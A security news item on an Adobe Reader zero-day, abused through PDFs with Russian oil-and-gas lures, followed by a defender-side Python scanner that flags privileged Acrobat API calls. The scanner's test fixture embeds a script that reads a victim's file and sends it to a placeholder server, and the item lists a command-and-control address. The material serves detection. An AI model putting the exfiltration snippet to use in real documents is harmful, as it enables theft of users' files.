According to EXPMON, hackers used an Adobe Reader zero-day for months to deliver a sophisticated PDF exploit. A suspicious file submitted to EXPMON on 26 March was flagged by its detection-in-depth pipeline even though only 13 of 64 antivirus engines on VirusTotal detected it. The sample abuses an unpatched Adobe Reader flaw to run privileged Acrobat APIs: it calls util[.]readFileIntoStream() to read local files, then calls RSS[.]addFeed() to send the stolen data to a remote server and receive further malicious JavaScript.
A researcher who goes by the online moniker Gi7w0rm reported that documents in the campaign contain Russian-language lures referencing current events in Russia's oil and gas industry. On 8 April 2025, a new variant that connects to the IP address 188.214.34[.]20:34123 was observed, and the sample appeared on VirusTotal on 28 November 2025, indicating that the campaign has been ongoing for at least four months.
The analysis notes that the sample acts as an initial-stage exploit that collects information and could be followed by remote code execution or a sandbox escape if conditions are met.
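As an added defender-side example (not code from EXPMON's or the researcher's analysis), the following Python script pulls JavaScript out of a PDF's inline /JS strings and Flate-compressed streams and counts references to the two privileged Acrobat APIs named above, folding bracket-style access such as util["readFileIntoStream"] back to dotted form. The embedded PDF skeleton, the file path and the server placeholder are constructed for illustration.

```python
import re
import zlib

# Privileged Acrobat JavaScript APIs named in the EXPMON analysis. Together they
# describe the sample's pattern: read a local file, then push it to a remote URL.
PRIVILEGED_APIS = ("util.readFileIntoStream", "RSS.addFeed")

# Dictionary + stream pairs (nested dictionaries are not handled) and inline /JS strings.
STREAM_RE = re.compile(rb"<<([^>]*?)>>\s*stream\r?\n(.*?)\nendstream", re.S)
INLINE_JS_RE = re.compile(rb"/JS\s*\((.*?)(?<!\\)\)", re.S)
# Bracket access such as util["readFileIntoStream"] is folded back to dotted form.
BRACKET_RE = re.compile(r"""\[\s*["']([A-Za-z_]\w*)["']\s*\]""")


def extract_scripts(pdf: bytes) -> list[str]:
    """Return candidate JavaScript text from inline /JS strings and all streams."""
    scripts = []
    for m in INLINE_JS_RE.finditer(pdf):
        raw = m.group(1).replace(rb"\(", b"(").replace(rb"\)", b")")
        scripts.append(raw.decode("latin-1"))
    for dict_part, body in STREAM_RE.findall(pdf):
        if b"/FlateDecode" in dict_part:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                continue  # corrupt or non-Flate data; nothing to inspect
        scripts.append(body.decode("latin-1"))
    return scripts


def scan_pdf(pdf: bytes) -> dict[str, int]:
    """Count references to each privileged API across all script candidates."""
    hits: dict[str, int] = {}
    for script in extract_scripts(pdf):
        normalized = BRACKET_RE.sub(r".\1", script)
        for api in PRIVILEGED_APIS:
            n = normalized.count(api)
            if n:
                hits[api] = hits.get(api, 0) + n
    return hits


def build_sample_pdf() -> bytes:
    """Constructed, non-functional PDF skeleton carrying a Flate-compressed script."""
    js = (b'var s = util["readFileIntoStream"]("/C/Users/victim/Documents/report.doc");\n'
          b'RSS.addFeed("http://REMOTE-SERVER-PLACEHOLDER/feed?d=" + s);')
    stream = zlib.compress(js)
    header = (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /OpenAction 2 0 R >>\nendobj\n"
              b"2 0 obj\n<< /S /JavaScript /JS 3 0 R >>\nendobj\n"
              b"3 0 obj\n<< /Length " + str(len(stream)).encode() + b" /Filter /FlateDecode >>\nstream\n")
    return header + stream + b"\nendstream\nendobj\n%%EOF\n"
```

Running scan_pdf(build_sample_pdf()) reports one hit for each API; a document with no JavaScript yields an empty result.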